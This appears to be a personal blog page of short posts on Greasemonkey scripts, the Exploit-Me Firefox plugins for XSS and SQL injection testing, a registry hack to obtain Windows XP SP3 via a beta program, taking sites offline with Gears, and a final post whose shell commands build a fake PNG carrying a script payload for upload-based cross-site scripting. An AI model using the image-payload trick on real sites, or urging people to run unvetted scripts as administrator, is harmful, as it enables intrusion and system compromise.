Best Scripts -http://userscripts.org/scripts-

i found this site by accident,there are so many script there that u can install online to your computer.i think this will very useful because some scripts make our job became easier.besie that so many cool script,it’s like a tricks.ill show you some of the scripts,this is several best greasemongkey script,i haven’t test it yet.because i don’t feel that i need this.this is what i found :

1. best greasemongkey script – ultimate google make over

As seen in the screenshot above the script organizes the results into two columns, numbers them, grabs each website’s icon, and much more. You’ll also notice that there are no page numbers at the bottom of the results screen. That’s because there is a semi-transparent box in the upper-right corner that takes care of that. Since it is always located in the same spot it makes it much easier to keep going to the next page of the results. Of course you can pick and choose which of those features to enable assuming that you’re comfortable changing a few numbers around in the script’s code.

you install by open this link

2. best greasemongkey script – google calender time line

Even though the settings do appear to be directly integrated into your Google Calendar, they are actually stored on your computer. That means that the settings are not carried from one computer to another, and this is yet another reason I wish Google offered a custom plugin system for some of their services.

exploit mE : sql inject-me & xss-me Plugin

Security Compass announces the release of the open source Firefox plugins for web application penetration testing at the SecTor conference in Toronto.

exploit mE is A suite of Firefox web application security testing tools. Exploit-Me tools are designed to be lightweight and easy to use. Instead of using proxy tools like many web application testing tools, Exploit-Me integrates directly with Firefox.

XSS-mE

The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.

If the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

The Cross-Site Script Me (XSS-Me) tool allows the user to test their web applications against common XSS vulnerabilities. The Beta2 release corrects an issue with the plugin failing to work with Firefox 2.0.0.10.

XSS-Me 0.2 is available here.

SQL INJECT-mE

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

The tool work by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

SQL Inject-Me 0.2 is available here.

Get Windows XP SP3 FREE Through Windows Update

this is really good one, we can get windows SP 3 for free through windows update, i’m haven’t try this one yet but it’s look like gonna work. this is the step :

• Download this file ( WindowsXPSP3Hack.cmd ). Once you have downloaded the file, login as administrator and run the file by double clicking it. Wait for the Confirmation Message on screen.
• The Above file adds a few entries to the Windows Registry that makes Microsoft think that you are a part of the Private beta program.
• Check for new updates on Windows Update. You should now see Windows XP SP3 listed in the available updates.
• Download and install it. Reboot whenever necessary.

Continue reading ‘Get Windows XP SP3 FREE Through Windows Update’

access Static website Offline with Greasmonkey

accessing internet without no internet connection would be great . But what if you’re a user that always has an internet connection? Then adding Gears to a site doesn’t do much, right? Wrong. Imagine your favorite website is now stored on your computer, and it syncs whenever there’s altered content. Whenever you look at the site, your browser is grabbing everything straight from your hard drive. Did you just make a search for your best friend on Facebook? Don’t wait 5 seconds the next time that search runs, have the results immediately! Meanwhile, save the webmasters’ precious bandwidth/server power!

But alas, if only it were a reality that every site was Gears enabled — the internet faster and available anywhere. You’d need every site to implement Gears — GearsMonkey to the rescue!

 

By using Google Gears with the Firefox Greasemonkey plugin, you can inject Gears code into any website that you want. Don’t wait for your favorite website to enable offline support — do it yourself.

 

Follow along as I show you step-by-step how to take Wikipedia offline.

You need the following tools to take websites offline:

1. Greasemonkey – Use Greasemonkey to inject Google Gears code onto a webpage after it loads
2. Google Gears – You’ll be utilizing all three components that make up Google Gears:
   • LocalServer: Capture any URL
   • Database (local to computer): Keep track of what URLs you have stored, personal preferences, etc.
   • WorkerPool (threading): Keep the UI snappy — run heavy computations, data synchronizations, etc. in the background. Also can help overcome cross-origin dilemmas.
3. iFrame – Use in conjunction with Greasemonkey to allow for capture of cross-origin resources.

Steps to taking Wikipedia offline

Here is an outline of what we need to do to take Wikipedia offline. It is a step-by-step guide of what needs to happen as soon as a Wikipedia page is loaded.

 

Continue reading ‘access Static website Offline with Greasmonkey’

embed script to image

i watch vidoe that teach another way to embed code to images, like we know there are some tools to embed script or comment into images like this one but this one is another way to embed xss script into images.

first open new shell n write this

echo -en "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0DPHCK\x00\x00\x00\x01\x00\x00\x00\x01" > images.png

enter your code like this :

echo -n "<hml><body><script>alert('wicux ngetes');</script></body></html>" >> iamges.png

how to test it??

1.upload your images

2.press Ctrl + U to show the page source and find the path of your picture

3.copy the path and add it to the url example : http://taek.com/imagespath/images.png

4.u’r script will run